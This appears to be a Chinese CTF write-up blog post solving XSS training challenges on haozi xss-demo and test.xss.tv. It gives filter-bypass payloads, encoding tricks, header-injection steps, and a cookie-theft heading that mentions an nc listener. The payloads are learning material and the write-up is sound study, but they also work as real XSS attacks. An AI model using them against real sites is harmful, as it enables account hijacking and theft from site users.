LetheSec

XSS刷题之旅

0x01 一些资源或文章：

XSS小结
XSS总结
那些年我们没能bypass的xss filter
XSS Filter Evasion Cheat Sheet 中文版
XSS攻击手段&在CTF中的运用

0x02 常用Payload（慢慢积累…）

aa
aa
aa

需要用编码绕过时：
Base64：M

urlencode：M 

HTML实体编码 ：M
aa
bb
cc



<iframe src="aaa" onmouseover=alert('xss') /><iframe>
<iframe src="javascript&colon;prompt&lpar;`xss`&rpar;">

Cookie盗取：

nc监听端口1234

Tips:

- 反引号代替圆括号
- 换行绕过正则
- ,也可以用--!>闭合
- //可以用换行来绕过
- 都可以在html的script标签里单独使用进行单行注释
- ſ 符号转换为大写后正好为大写字母 S
- 可以用 %0a 代替空格进行绕过

0x03 XSS编码

JS编码

JS提供了四种字符编码的策略，

三个八进制数字，如果数字不够，在前面补零，如a的编码为\141
两个十六进制数字，如果数字不够，在前面补零，如a的编码为\x61
四个十六进制数字，如果数字不够，在前面补零，如a的编码为\u0061
对于一些控制字符，使用特殊的C类型的转义风格，如\n和\r

HTML实体编码

命名实体
以&开头，以分号结尾的，如<的编码为&1t;

字符编码
十进制，十六进制的ASCII码或者Unicode字符编码。样式为&#数值;

如<的编码为

<(10进制)

<(16进制)

URL编码

这里为url全编码，也就是两次url编码

如alert的url全编码为%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34

String.fromCharCode编码

如alert的编码为String.fromCharCode(97,108,101,114,116)

0x04 刷题

haozi-xss-demo

项目：https://github.com/haozi/xss-demo
地址：https://xss.haozi.me
包含alert(1)的js文件地址：https://xss.haozi.me/j.js
过关方式：构造input code，成功执行alert(1)

0x00

server code:

function render (input) {
  return '' + input + '
'
}

直接构造js语句即可。

payload:

<script>alert(1)script>

html:

<div><script>alert(1)script>div>

0x01

server code:

function render (input) {
  return ''</span> <span class="token operator">+</span> input <span class="token operator">+</span> <span class="token string">''
}

这一关插入的地方在html标签里面，所以要先闭合</code>标签，再进行构造。 nput code: <pre><code class="prism language-html"></textarea><script>alert(1)</script> </code></pre> html: <pre><code class="prism language-html"><textarea></textarea><script>alert(1)</script></textarea> </code></pre> <h6>0x02</h6> server code: <pre><code class="prism language-javascript">function render (input) { return '<input type="name" value="' + input + '">' } </code></pre> input的地方在尖括号内部，需要先闭合尖括号。 payload: <pre><code class="prism language-html">"><script>alert(1)</script> </code></pre> html: <pre><code class="prism language-html"><input type="name" value=""><script>alert(1)</script>"> </code></pre> <h6>0x03</h6> server code: <pre><code class="prism language-javascript">function render (input) { const stripBracketsRe = /[()]/g input = input.replace(stripBracketsRe, '') return input } </code></pre> 这一关用正则表达式过滤了括号（替换为空），这里有个小tip，可以用反引号代替圆括号。 其他关于过滤圆括号的一些方法，可参考：XSS相关一些个人Tips payload: <pre><code class="prism language-html"><script>alert`1`</script> </code></pre> html: <pre><code class="prism language-html"><script>alert`1`</script> </code></pre> <h6>0x04</h6> server code: <pre><code class="prism language-javascript">function render (input) { const stripBracketsRe = /[()`]/g input = input.replace(stripBracketsRe, '') return input } </code></pre> 过滤了圆括号和反引号，所以上一关的方法就不能用了。 可以用各种编码进行绕过，如url编码、html实体编码。 <ul> <li><code><svg></code>标签中可以直接执行实体字符,payload2</li> <li>h5中<code>iframe</code>标签的<code>srcdoc</code>属性，<code>srcdoc</code>里的代码会作为<code>iframe</code>中的内容显示出来，<code>srcdoc</code>中可以直接去写转译后的html片段,payload3</li> </ul> payload: <pre><code class="prism language-html"><img src=1 οnerrοr=location="javascript:alert%281%29"> <svg><script>alert&#40;1&#41;</script> <iframe srcdoc="<script>alert(1)</script>"> </code></pre> <h6>0x05</h6> server code: <pre><code class="prism language-javascript">function render (input) { input = input.replace(/-->/g, '?') return '' } </code></pre> 这一关将html中的注释符<code>--></code>替换成了一个表情，并且输入的内容是包含在一段注释符里的。 html通常的的注释符为：<code></code>，测试发现<code><!- -!></code>、<code></code>将后面的<code>')</code>注释掉。 经过我自己的测试，<code></code>都可以在html的<code>script</code>标签里单独使用进行单行注释.，这里<code><</code>被过滤了，所以使用<code>--></code> payload: <pre><code class="prism language-html"> alert(1); --> </code></pre> html: <pre><code class="prism language-html"><script> // alert(' alert(1); -->') </script> </code></pre> <h6>0x0E</h6> server code: <pre><code class="prism language-javascript">function render (input) { input = input.replace(/<([a-zA-Z])/g, '<_$1') input = input.toUpperCase() return '<h1>' + input + '</h1>' } </code></pre> 匹配以<code><</code>起始的字符，替换为<code><_$1</code>，并且把输入转换为大写，这样这样的标签就都用不了了。 这里有个tip： 发现了一个<code>ſ</code>字符，是古英语中<code>s</code>的写法，但现在不会当作英文字母a-zA-Z，关键是<code>ſ</code>转换为大写后正好为<code>S</code>，这样就可以绕过正则使用<code><script></code>标签引如外部js。 payload: <pre><code class="prism language-html"><ſcript src="https://www.segmentfault.com.haozi.me/j.js"></script> </code></pre> html: <pre><code class="prism language-html"><h1><SCRIPT SRC="HTTPS://WWW.SEGMENTFAULT.COM.HAOZI.ME/J.JS"></SCRIPT></h1> </code></pre> <h6>0x0F</h6> server code: <pre><code class="prism language-javascript">function render (input) { function escapeHtml(s) { return s.replace(/&/g, '&') .replace(/'/g, ''') .replace(/"/g, '"') .replace(/</g, '<') .replace(/>/g, '>') .replace(/\//g, '/') } return `<img src οnerrοr="console.error('${escapeHtml(input)}')">` } </code></pre> 过滤了<code>& ' " < > /</code>，转换为了html实体编码，但是由于input code在img标签内，所以html实体编码是可以被直接解析的。 所以闭合前面的标签，在构造语句即可。 payload: <pre><code class="prism language-html">');alert('1 </code></pre> html: <pre><code class="prism language-html"><img src onerror="console.error('');alert('1')"> 实际上就是 <img src onerror="console.error('');alert('1')"> </code></pre> <h6>0x10</h6> server code: <pre><code class="prism language-javascript">function render (input) { return ` <script> window.data = ${input} </script> ` } </code></pre> 由于input实在script标签里面，且没有任何过滤，所以直接闭合前面的语句，构造下一条语句即可。 payload: <pre><code class="prism language-html">'';alert(1) </code></pre> html: <pre><code class="prism language-html"><script> window.data = '';alert(1) </script> </code></pre> <h6>0x11</h6> server code: <pre><code class="prism language-javascript">// from alf.nu function render (s) { function escapeJs (s) { return String(s) .replace(/\\/g, '\\\\') .replace(/'/g, '\\\'') .replace(/"/g, '\\"') .replace(/`/g, '\\`') .replace(/</g, '\\74') .replace(/>/g, '\\76') .replace(/\//g, '\\/') .replace(/\n/g, '\\n') .replace(/\r/g, '\\r') .replace(/\t/g, '\\t') .replace(/\f/g, '\\f') .replace(/\v/g, '\\v') // .replace(/\b/g, '\\b') .replace(/\0/g, '\\0') } s = escapeJs(s) return ` <script> var url = 'javascript:console.log("${s}")' var a = document.createElement('a') a.href = url document.body.appendChild(a) a.click() </script> ` } </code></pre> 用反斜杠转移了一堆字符，但是<code>"</code>被转义成<code>\"</code>正好可以闭合<code>console.log("\")</code>，既然闭合了前面的语句那么之后就构造后面的语句就行了。 payload: <pre><code class="prism language-html">"),alert(1)// ");alert("1 "),alert(1)(" 这三个都可以.. </code></pre> html: <pre><code class="prism language-html"><script> var url = 'javascript:console.log("\"),alert(1)\/\/")' var a = document.createElement('a') a.href = url document.body.appendChild(a) a.click() </script> </code></pre> <h6>0x12</h6> server code: <pre><code class="prism language-javascript">// from alf.nu function escape (s) { s = s.replace(/"/g, '\\"') return '<script>console.log("' + s + '");</script>' } </code></pre> 匹配<code>"</code>替换为<code>\"</code>，这里直接用<code>\")</code>闭合前面的双引号会被转义，所以在加一个<code>\</code>来转义<code>\</code>即可。 payload: <pre><code class="prism language-html">\");alert(1);</script> </code></pre> html: <pre><code class="prism language-html"><script>console.log("\\");alert(1);</script>");</script> </code></pre> 这一套题主要是熟悉一下基本绕过方式，实战性不是很强，初学XSS还需继续努力。 那么就再刷一套题吧 <h4>XSS挑战</h4> 题目地址：http://test.xss.tv/ <h5>Level 1</h5> 输入的地方，在h2标签内，先闭合标签再构造。 payload： <code></h2><script>alert(1)</script></code> <h5>Level 2</h5> <code><input name="keyword" value="input code"></code> 输入点在<code>input标签内部</code>，所以先闭合<code>input</code>标签。 payload： <code>"><script>alert(1)</script></code> <h5>Level 3</h5> 这一关输入点，同样在<code>input</code>标签的<code>value</code>值内，尝试上一关闭合标签构造，但是没有成功。 双引号闭合<code>value="</code>失败，单引号闭合成功。 然后利用onclick、onmouseover等事件进行弹窗。 注释掉后面的代码。 payload: <code>' onmouseover=alert(1)//</code> <h5>Level 4</h5> 与上一关类似，用双引号闭合<code>value="</code>即可。 payload: <code>" onclick=alert(1)//</code> <h5>Level 5</h5> 这一关会将<code>script</code>替换成<code>scr_ipt</code>，<code>on</code>也会被替换成<code>o_n</code>。 我们可以闭合<code><input></code>后利用<code><a></code>标签进行弹窗： payload: <code>"><a href="javascript:alert(1)">Lethe</a>//</code> <h5>Level 6</h5> 这一关在上一关的基础上，多过滤了<code>href</code>、<code>src</code>、<code>data</code>。 经测试，可以利用大小写进行绕过。 payload： <code>"><a hREf="javascript:alert(1)">Lethe</a>//</code> <h5>Level 7</h5> 先用之前的payload进行测试，发现<code>href</code>和<code>script</code>直接消失了，于是尝试双写绕过，成功。 payload: <code>"><a hrhrefef="javascriscriptpt:alert(1)">Lethe</a>//</code> <h5>Level 8</h5> 这一关和前面稍有不同，可以添加友情链接，添加过后的内容直接包含在<code><a href="input code">友情链接</a></code>里面。 于是先尝试<code>javascritpt:alert(1)</code>，但是<code>script</code>同样被替换成了<code>scr_ipt</code>。 因为html标签内可以直接解析html实体编码，于是尝试用实体编码绕过。 payload: <code>javascript:alert(1)</code> <h5>Level 9</h5> 和上题类似，但是这里对链接有了一定要求，必须包含<code>http://</code>，却没有要求一定要在开头…不知道有什么意义 所以直接在构造的语句最后加上<code>http://</code>绕过检测，再注释掉即可。 payload： <code>javascript:alert(1)//http://</code> <h5>Level 10</h5> 这题没有输入框，url上给了一个keyword参数，尝试闭合再构造，虽然回显的内容没有过滤，但是却不会弹窗，查看源码，发现还有一个隐藏的form表单，看看能否利用。 <a href="http://img.e-com-net.com/image/info8/17b519a30a0b46248baac811f2493825.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/17b519a30a0b46248baac811f2493825.png" alt="XSS刷题之旅_第1张图片" width="458" height="160" style="border:1px solid black;"></a> 尝试<code>?t_link=Lethe&t_history=Lethe&t_sort=Lethe</code> 发现<code>t_sort</code>参数可以利用 <a href="http://img.e-com-net.com/image/info8/8648cd9599ee4c9cb8d47e318469bb22.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/8648cd9599ee4c9cb8d47e318469bb22.png" alt="XSS刷题之旅_第2张图片" width="435" height="103" style="border:1px solid black;"></a> 于是进行构造，发现尖括号被过滤了，于是利用事件进行弹窗。 payload: <code>?t_sort=" type=image src=x onerror=alert(1)//</code> <h5>Level 11</h5> 和上一关一样有一个隐藏的表单，也是<code>t_sort</code>参数可以利用 <a href="http://img.e-com-net.com/image/info8/2f847e1b6d8641feb083f6ea8db64aef.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/2f847e1b6d8641feb083f6ea8db64aef.png" alt="XSS刷题之旅_第3张图片" width="420" height="119" style="border:1px solid black;"></a> 用上一关的payload进行测试，发现双引号也被过滤了，应该又要换个思路了。 重新打开页面观察源码，看到一个可疑的地方，那新增的一个参数不是白加的，当你从第10关跳到第11关时，<code>t_ref</code>的value值是页面的Referer的值。 <a href="http://img.e-com-net.com/image/info8/7ba40a0e5e43439b8848a55480a634f3.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/7ba40a0e5e43439b8848a55480a634f3.jpg" alt="在这里插入图片描述" width="650" height="75"></a> 于是在跳转的时候抓包修改Referer的值为<code>" type=text onclick="alert(1)</code>，如下： <a href="http://img.e-com-net.com/image/info8/ce96f170360644aba63a2611d4e44812.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/ce96f170360644aba63a2611d4e44812.jpg" alt="XSS刷题之旅_第4张图片" width="650" height="241" style="border:1px solid black;"></a> 然后在Target界面Forward，回到闯关页面发现已成功注，点击输入框即可弹窗。 <a href="http://img.e-com-net.com/image/info8/fdf9ad88bb0f4bcfaa8dcb4fda558855.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/fdf9ad88bb0f4bcfaa8dcb4fda558855.jpg" alt="XSS刷题之旅_第5张图片" width="575" height="558" style="border:1px solid black;"></a> <h5>Level 12</h5> 与上一关类似，不过这里是利用User-Agent: <a href="http://img.e-com-net.com/image/info8/d4e1926722bf4aa8b393112d8fa75ec4.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/d4e1926722bf4aa8b393112d8fa75ec4.jpg" alt="XSS刷题之旅_第6张图片" width="650" height="241" style="border:1px solid black;"></a> 同样抓包修改User-Agent的值进行构造 <a href="http://img.e-com-net.com/image/info8/3ad33406d7424b59a46d1d00ae3a89e6.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/3ad33406d7424b59a46d1d00ae3a89e6.jpg" alt="XSS刷题之旅_第7张图片" width="650" height="242" style="border:1px solid black;"></a> payload: <code>" type=text onclick="alert(1)</code> <h5>Level 13</h5> 与前两关相同，只不过这一关是利用Cookie进行注入。 <a href="http://img.e-com-net.com/image/info8/48ee002f004646dc8f3321278182e1b9.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/48ee002f004646dc8f3321278182e1b9.jpg" alt="XSS刷题之旅_第8张图片" width="650" height="242" style="border:1px solid black;"></a> 抓包修改Cookie为：<code>user=" type=text onclick="alert(1)</code>即可 <a href="http://img.e-com-net.com/image/info8/85e73e2e23464693b4e06ca02054686b.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/85e73e2e23464693b4e06ca02054686b.jpg" alt="XSS刷题之旅_第9张图片" width="650" height="240" style="border:1px solid black;"></a> <h5>Level 14</h5> 进入14关，没有输入框，url中没有参数，查看源码，发现使用了<code><iframe></code>标签引入了<code>http://www.exifviewer.org/</code> 但是我这边一直打不开<code>http://www.exifviewer.org/</code>，根据网上的题解，上传一个含有xss代码的图片触发xss，关于exif xss这一题的解法，可参考:https://xz.aliyun.com/t/1206 <h5>Level 15</h5> 页面什么都没有，那么直接看源码 <a href="http://img.e-com-net.com/image/info8/b96782ff8b404a0ab99c428920dd8f8c.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/b96782ff8b404a0ab99c428920dd8f8c.jpg" alt="XSS刷题之旅_第10张图片" width="650" height="205" style="border:1px solid black;"></a>第一眼看貌似也没什么，实际上还是因为我对js不是很熟悉…搜索得到，这里使用了AngularJS框架的 <code>ng-include</code> 指令，可参考：https://www.runoob.com/angularjs/ng-ng-include.html 其实就是可以利用 <code>ng-include</code> 指令来包含文件> 有两默认情况下，包含的文件需要包含在同一个域名下，也就是符合SOP。 所以网上大多方法是包含了第一关的代码，如下payload：<code>?src='level1.php?name=test<img src=1 onerror=alert(1)>'</code> 但是我在做的过程中发现，引用的名字会直接出现在源码上： <a href="http://img.e-com-net.com/image/info8/9ee35e96f95842ecac755514992368a3.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/9ee35e96f95842ecac755514992368a3.jpg" alt="XSS刷题之旅_第11张图片" width="650" height="372" style="border:1px solid black;"></a> 那么理论上通过闭合也是可以的 于是尝试payload: <code>?src="><img src="x" onerror=alert(1)></code> 发现真的是可以的…<a href="http://img.e-com-net.com/image/info8/fcc02731eeeb420c83dd2761938079b0.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/fcc02731eeeb420c83dd2761938079b0.jpg" alt="XSS刷题之旅_第12张图片" width="650" height="449" style="border:1px solid black;"></a> <h5>Level 16</h5> 输入点包含在<code><center></code>标签内，过滤了空格，可以用<code>%0a</code>代替空格进行绕过。 payload: <code>?keyword=<img%0asrc=x%0aonerror=alert(1)></code> <h5>Level 17</h5> 进入之后会看到一个关于flash的什么东西，暂时先不管，做xss先找输入输出点。 url中有<code>arg01</code>和<code>arg02</code>两个参数，应该是输入点，查看源码发现在<code><embed></code>标签的<code>src</code>中会输出这两个参数的值，如下： <a href="http://img.e-com-net.com/image/info8/aef509c7a1d248e7b0ad39745b0cf8c6.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/aef509c7a1d248e7b0ad39745b0cf8c6.jpg" alt="XSS刷题之旅_第13张图片" width="650" height="229" style="border:1px solid black;"></a> 先试试闭合，发现过滤了尖括号，可以考虑用<code>onerror</code>弹窗。 payload： <code>?arg01=&arg02= onmouseover=alert(1)</code> <h5>Level 18</h5> 这一关和17关好像是一样的… payload: <code>?arg01=&arg02= onmouseover=alert(1)</code> Level 19 20 好像是关于flash xss的，由于了解不多，而且现在网站用flash的也越来越少了，就不做了。 <h3>0x05 小结</h3> 做了这两套题，这只能说是刚刚了解了XSS是什么，还要很多很多知识需要学习，尤其是要加强实战方面的运用，这就只能在以后的学习过程中慢慢积累了。 </div> </div> </div> </div> </div>  <div id="SOHUCS" sid="1292948364433891328"></div> <script type="text/javascript" src="/views/front/js/chanyan.js"></script>  <div class="youdao-fixed-ad" id="detail_ad_bottom"></div> </div> <div class="col-md-3"> <div class="row" id="ad">  <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_1"> </div> </div>  <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_2"></div> </div>  <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_3"></div> </div> </div> </div> </div> </div> </div> <div class="container"> <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(CTF,XSS)</h4> <div id="paradigm-article-related"> <div class="recommend-post mb30"> <ul class="widget-links"> <li><a href="/article/1835489586684456960.htm" title="ARM驱动学习之4小结" target="_blank">ARM驱动学习之4小结</a> JT灬新一 <a class="tag" taget="_blank" href="/search/%E5%B5%8C%E5%85%A5%E5%BC%8F/1.htm">嵌入式</a><a class="tag" taget="_blank" href="/search/C%2B%2B/1.htm">C++</a><a class="tag" taget="_blank" href="/search/arm%E5%BC%80%E5%8F%91/1.htm">arm开发</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a> <div>ARM驱动学习之4小结#include#include#include#include#include#defineDEVICE_NAME"hello_ctl123"MODULE_LICENSE("DualBSD/GPL");MODULE_AUTHOR("TOPEET");staticlonghello_ioctl(structfile*file,unsignedintcmd,unsignedlo</div> </li> <li><a href="/article/1835448111909138432.htm" title="react-intl——react国际化使用方案" target="_blank">react-intl——react国际化使用方案</a> 苹果酱0567 <a class="tag" taget="_blank" href="/search/%E9%9D%A2%E8%AF%95%E9%A2%98%E6%B1%87%E6%80%BB%E4%B8%8E%E8%A7%A3%E6%9E%90/1.htm">面试题汇总与解析</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" href="/search/%E4%B8%AD%E9%97%B4%E4%BB%B6/1.htm">中间件</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/boot/1.htm">boot</a><a class="tag" taget="_blank" href="/search/%E5%90%8E%E7%AB%AF/1.htm">后端</a> <div>国际化介绍i18n：internationalization国家化简称，首字母+首尾字母间隔的字母个数+尾字母，类似的还有k8s(Kubernetes)React-intl是React中最受欢迎的库。使用步骤安装#usenpmnpminstallreact-intl-D#useyarn项目入口文件配置//index.tsximportReactfrom"react";importReactDOMf</div> </li> <li><a href="/article/1835417097660887040.htm" title="Linux CTF逆向入门" target="_blank">Linux CTF逆向入门</a> 蚁景网络安全 <a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a><a class="tag" taget="_blank" href="/search/CTF/1.htm">CTF</a> <div>1.ELF格式我们先来看看ELF文件头，如果想详细了解，可以查看ELF的manpage文档。关于ELF更详细的说明：e_shoff：节头表的文件偏移量（字节）。如果文件没有节头表，则此成员值为零。sh_offset：表示了该section（节）离开文件头部位置的距离+-------------------+|ELFheader|---++--------->+-------------------</div> </li> <li><a href="/article/1835344356412846080.htm" title="Windows安装ciphey编码工具，附一道ciscn编码题例" target="_blank">Windows安装ciphey编码工具，附一道ciscn编码题例</a> im-Miclelson <a class="tag" taget="_blank" href="/search/CTF%E5%B7%A5%E5%85%B7/1.htm">CTF工具</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a> <div>TA是什么一款智能化的编码分析解码工具，对于CTF中复杂性编码类题目可以快速攻破。编码自动分析解码的神器。如何安装Windows环境Python3.864位（最新的版本不兼容，32位的也不行）PIP直接安装pipinstallciphey-ihttps://pypi.mirrors.ustc.edu.cn/simple/安装后若是出现报错请根据错误代码行数找到对应文件，r修改成rb即可。使用标准语</div> </li> <li><a href="/article/1835313002123980800.htm" title="2005年高考英语北京卷 - 阅读理解C" target="_blank">2005年高考英语北京卷 - 阅读理解C</a> 让文字更美 <div>Howcouldwepossiblythinkthatkeepinganimalsincagesinunnaturalenvironments-mostlyforentertainmentpurposes-isfairandrespectful?我们怎么可能认为把动物关在非自然环境的笼子里——主要是为了娱乐目的——是公平和尊重的呢？Zooofficialssaytheyareconcernedab</div> </li> <li><a href="/article/1835240560114364416.htm" title="CTF-bugku-crypto-[7+1+0]-base64解码之后做偏移" target="_blank">CTF-bugku-crypto-[7+1+0]-base64解码之后做偏移</a> 沧海一粟日尽其用 <a class="tag" taget="_blank" href="/search/%E7%AE%97%E6%B3%95/1.htm">算法</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a> <div>CTF-bugku-crypto-[7+1+0]-base64解码之后做偏移1.题目2.解题思路2.1base64编码原理2.2解题思路2.2.1base64解码找规律2.2.2破解思路3.解题脚本4.flag5.附EASCII码表1.题目提示信息：7+1+0？格式bugku{xxxxx}密文：4nXna/V7t2LpdLI44mn0fQ==要求：破解密文获得flag2.解题思路2.1base64</div> </li> <li><a href="/article/1835217746175029248.htm" title="CTF常见编码及加解密（超全）第二篇" target="_blank">CTF常见编码及加解密（超全）第二篇</a> 不会代码的小徐 <a class="tag" taget="_blank" href="/search/%E7%BC%96%E7%A0%81%E5%AF%86%E7%A0%81/1.htm">编码密码</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E5%AF%86%E7%A0%81%E5%AD%A6/1.htm">密码学</a><a class="tag" taget="_blank" href="/search/%E9%A2%84%E7%BC%96%E7%A0%81/1.htm">预编码</a> <div>HTML实体编码简述：字符实体是用一个编号写入HTML代码中来代替一个字符，在使用浏览器访问网页时会将这个编号解析还原为字符以供阅读。举例：highlighter-HTML明文：hello，world.十进制：hello，world.十六进制：hel</div> </li> <li><a href="/article/1834925081566998528.htm" title="Prism 教程" target="_blank">Prism 教程</a> yang_B621 <a class="tag" taget="_blank" href="/search/Prism/1.htm">Prism</a><a class="tag" taget="_blank" href="/search/IOC/1.htm">IOC</a> <div>http://t.csdnimg.cn/VXSSvhttps://blog.csdn.net/u010476739/article/details/119341731Prism-随笔分类-Hello——寻梦者！-博客园(cnblogs.com)C#IoC学习笔记-缥缈的尘埃-博客园(cnblogs.com)WPF_SchuylerEX的博客-CSDN博客</div> </li> <li><a href="/article/1834909327081697280.htm" title="Apache POI用法" target="_blank">Apache POI用法</a> JH3073 <a class="tag" taget="_blank" href="/search/apache/1.htm">apache</a> <div>一、ApachePOI是什么ApachePOI是用Java编写的免费开源的跨平台的JavaAPI，ApachePOI提供API给Java程序对MicrosoftOffice格式档案读和写的功能，其中使用最多的就是使用POI操作Excel文件。二、POI结构HSSF－提供读写MicrosoftExcelXLS格式档案的功能XSSF－提供读写MicrosoftExcelOOXMLXLSX格式档案的功能</div> </li> <li><a href="/article/1834896977599492096.htm" title="CTF——web方向学习攻略" target="_blank">CTF——web方向学习攻略</a> 一则孤庸 <a class="tag" taget="_blank" href="/search/CTF/1.htm">CTF</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/CTF/1.htm">CTF</a> <div>1计算机基础操作系统：熟悉Linux命令，方便使用Kali。网络技术：HCNA、CCNA。编程能力：拔高项，有更好。2web应用HTTP协议：必须掌握web开发框架web安全测试3数据库数据库基本操作SQL语句数据库优化4刷题</div> </li> <li><a href="/article/1834892561853018112.htm" title="CTF——web总结" target="_blank">CTF——web总结</a> oliveira-time <a class="tag" taget="_blank" href="/search/ctf/1.htm">ctf</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a> <div>解题思路做题先看源码关注可下载的资源(zip压缩包)抓包寻找可能存在的加密信息（base64）不管三七二十一先扫描目录再说ps：正常的应该是先扫描目录，然后发现后台进行爆破，发现爆破困难，然后去社工找其他信息。CTF——web个人总结_ctfweb-CSDN博客</div> </li> <li><a href="/article/1834856765066407936.htm" title="VueTreeselect el-tree-select 多选" target="_blank">VueTreeselect el-tree-select 多选</a> 小小并不小 <a class="tag" taget="_blank" href="/search/Vue/1.htm">Vue</a><a class="tag" taget="_blank" href="/search/element/1.htm">element</a><a class="tag" taget="_blank" href="/search/js/1.htm">js</a><a class="tag" taget="_blank" href="/search/vue.js/1.htm">vue.js</a><a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a> <div>1、VueTreeselect是一个多选组件npminstall--save@riophae/vue-treeselect全部代码//importthecomponentimportTreeselectfrom'@riophae/vue-treeselect'//importthestylesimport'@riophae/vue-treeselect/dist/vue-treeselect.cs</div> </li> <li><a href="/article/1834762137910734848.htm" title="ctf逆向解题——Bomb二进制炸弹" target="_blank">ctf逆向解题——Bomb二进制炸弹</a> Funkypantss <div>BombPhase1在输入阶段将由文件输入的字符存储在input中，在phase1，该阶段将原字符串存储到rdi中，调用pases_1函数进行字符串比较。image进入phase1函数，该函数将原字符串rdi与预先设定的字符串“BorderrelationswithCanadahaveneverbeenbetter.”（存储在rsi中）进行比较，用于比较的函数是strings_not_equal，</div> </li> <li><a href="/article/1834546422066802688.htm" title="【CTF】MISC常用工具集锦/使用方法简介" target="_blank">【CTF】MISC常用工具集锦/使用方法简介</a> 不会代码的小徐 <a class="tag" taget="_blank" href="/search/misc/1.htm">misc</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E6%B5%8B%E8%AF%95%E5%B7%A5%E5%85%B7/1.htm">测试工具</a> <div>前言#MISC题型多变而且工具繁杂，因此自己花时间整理了一份工具列表，以便日后参考用流畅地阅读这篇博客，你可能需要：Python2.7.18+Python3.8+任何一个更高版本的Python，使用conda管理Linux虚拟机，kali即可流畅访问Google/GitHub等站点的网络通用工具#PuzzleSolver#专为misc手打造的瑞士军刀(?)，整合了多种脚本（base，字频分析，pn</div> </li> <li><a href="/article/1834452515110875136.htm" title="网络安全的相关比赛有哪些？需要掌握哪些必备技能？" target="_blank">网络安全的相关比赛有哪些？需要掌握哪些必备技能？</a> 网安学习 <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%9A%84%E7%9B%B8%E5%85%B3%E6%AF%94%E8%B5%9B%E6%9C%89%E5%93%AA/1.htm">网络安全的相关比赛有哪</a> <div>01、CTF（夺旗赛）这是一种最常见的网络安全竞技形式，要求参赛者在限定时间内解决一系列涉及密码学、逆向工程、漏洞利用、取证分析等领域的挑战，获取标志（flag）并提交得分。通过举办CTF来培养网络安全人才，已经发展成为了国际网络安全圈的共识。CTF赛事可以分为线上赛和线下赛，线上赛通常是解题模式（Jeopardy），线下赛通常是攻防模式（Attack-Defense）。CTF赛事的代表性线下赛事</div> </li> <li><a href="/article/1834309309467553792.htm" title="第四部分：1---文件内核对象，文件描述符，输出重定向" target="_blank">第四部分：1---文件内核对象，文件描述符，输出重定向</a> S+叮当猫 <a class="tag" taget="_blank" href="/search/Linux/1.htm">Linux</a><a class="tag" taget="_blank" href="/search/CentOS/1.htm">CentOS</a><a class="tag" taget="_blank" href="/search/%E7%AE%97%E6%B3%95/1.htm">算法</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a> <div>目录structfile内核对象：如何读写文件？文件描述符在文件描述符表中的分配规则：输出重定向初步解析：dup2实现复制文件描述符：structfile内核对象：structfile是在内核空间中创建的用于描述文件的结构体，每当一个文件被打开时，内核会为该文件创建一个对应的structfile结构体，并在文件描述符表中为其分配一个文件描述符。基于文件的定义（文件=内容+属性），structfil</div> </li> <li><a href="/article/1834080024043548672.htm" title="最新网络安全（黑客）——自学篇" target="_blank">最新网络安全（黑客）——自学篇</a> 黑客小雨 <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a> 